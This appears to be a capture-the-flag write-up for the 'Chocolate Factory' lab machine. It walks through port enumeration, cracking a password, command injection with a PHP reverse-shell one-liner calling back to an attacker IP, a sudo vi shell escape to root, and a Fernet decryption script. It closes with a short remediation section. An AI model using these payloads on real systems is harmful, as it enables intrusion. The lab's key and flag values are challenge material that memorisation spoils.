Target IP: chocolate.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User (user.txt) & Root (root.txt - Decrypted)
1. Executive Summary
“Chocolate Factory” is a themed Linux machine. Initial Enumeration reveals a large range of ports providing ASCII art hints, leading us to a specific key file. Access is gained by leaking credentials via a vulnerable file download or FTP, followed by command execution on a web panel. Privilege escalation exploits a misconfigured Sudo permission on vi. The final root flag is encrypted, requiring a custom Python script and a previously discovered key to decrypt.
Key TTPs (MITRE ATT&CK):
- T1078 (Valid Accounts): Cracking credentials (
charlie). - T1059 (Command and Scripting Interpreter): PHP Remote Code Execution.
- T1548 (Abuse Elevation Control Mechanism): Exploiting Sudo on
vi(GTFOBins). - T1027 (Obfuscated Files or Information): Decrypting Fernet tokens.
2. Operational Setup
Host Configuration
echo "10.10.x.x chocolate.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
The Nmap scan reveals a “Chocolate Room” behavior on ports 100-125.
- Ports 100-125: Provide ASCII art and a hint: “Look somewhere else, its not here!”
- Port 113 (Ident): Provides a specific URL path:
http://localhost/key_rev_key.
B. File Gathering (FTP & Web)
- FTP (Port 21): Anonymous login allowed.
- Downloaded: An image and a base64 encoded file.
- Web (Port 80):
- We download the key mentioned in the hint:
wget http://chocolate.thm/key_rev_key. - Analysis: This key (
-VkgXh...) looks like a Fernet key (Base64url encoded 32-bytes). We save this for later.
C. Credential Discovery
You successfully retrieved /etc/passwd (likely via the web application).
- Hash Found: Inside
/etc/shadowor leaked files, a hash for usercharliewas found. - Cracked:
john --wordlist=rockyou.txt hash->cn7824.
4. Initial Access: The Command Panel
A. Web Login
We navigate to http://chocolate.thm/home.php (or index) and login.
- User:
charlie - Password:
cn7824
B. Remote Code Execution (RCE)
The dashboard has a “Command” input field. This is vulnerable to direct command injection.
Payload: We use a PHP one-liner because the web server processes it directly.
php -r '$sock=fsockopen("10.10.YOUR.IP",4444);system("sh <&3 >&3 2>&3");'Result:
Reverse shell caught on listener (nc -lvnp 4444).
User Flag: /home/charlie/user.txt.
C. Stabilization (The “Teleport” File)
Inside /home/charlie, there is a file named teleport. In this box, teleport is actually an SSH Private Key.
- Action: Copy content of
teleportto local machine ->id_rsa. - Permissions:
chmod 600 id_rsa. - Login:
ssh -i id_rsa charlie@chocolate.thm.
5. Privilege Escalation: Sudo VI
Enumeration
We check sudo rights.
sudo -l
# (root) NOPASSWD: /usr/bin/viExploitation (GTFOBins)
vi allows command execution. If run as sudo, we can spawn a root shell.
sudo vi -c ':!/bin/sh' /dev/null-c: Execute command on startup.:!/bin/sh: Escape to shell.
Status: Root access.
6. The Final Challenge: Decryption
We attempt to read the root flag.
cat /root/root.txt
# Output: gAAAAABfdb52... (Encrypted String)Wait, there is also a python script root.py hinting at Fernet encryption.
The Decryption Script
We combine the Key we found on Port 113 with the Ciphertext from root.txt.
Your script correctly identifies the algorithm (Fernet) and handles potential URL-decoding issues. Here is the simplified logic:
from cryptography.fernet import Fernet
# 1. The Key from Port 113
key = b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
# 2. The Flag from /root/root.txt
token = b'gAAAAABfdb52eejIlEaE9ttPY8ckMMfHTIw5lamAWMy8yEdGPhnm9_H_yQikhR--bPy09-NVQn8lF_PDXyTo-T7CpmrFfoVRWzlm0OffAsUM7KIO_xbIQkQojwf_unpPAAKyJQDHNvQaJ'
try:
f = Fernet(key)
print(f.decrypt(token).decode())
except Exception as e:
print(f"Error: {e}")Root Flag: (The output of the script).
7. Remediation (Blue Team)
- Sudo Configuration: Never allow
vi,vim,nano, orlessto run withNOPASSWDvia sudo. They all have shell escape features. - Web Input Sanitization: The “Command” panel on the web dashboard takes raw input and passes it to
system()orexec(). This is a critical vulnerability; use specific API calls instead of shell commands. - Port Hardening: Ports 100-125 should not be open. They leak information (ASCII art) and increase the attack surface.
- Sensitive Data: The encryption key (
key_rev_key) was hosted on a public web directory. Keys should be stored in secure vaults or environment variables, never in web roots.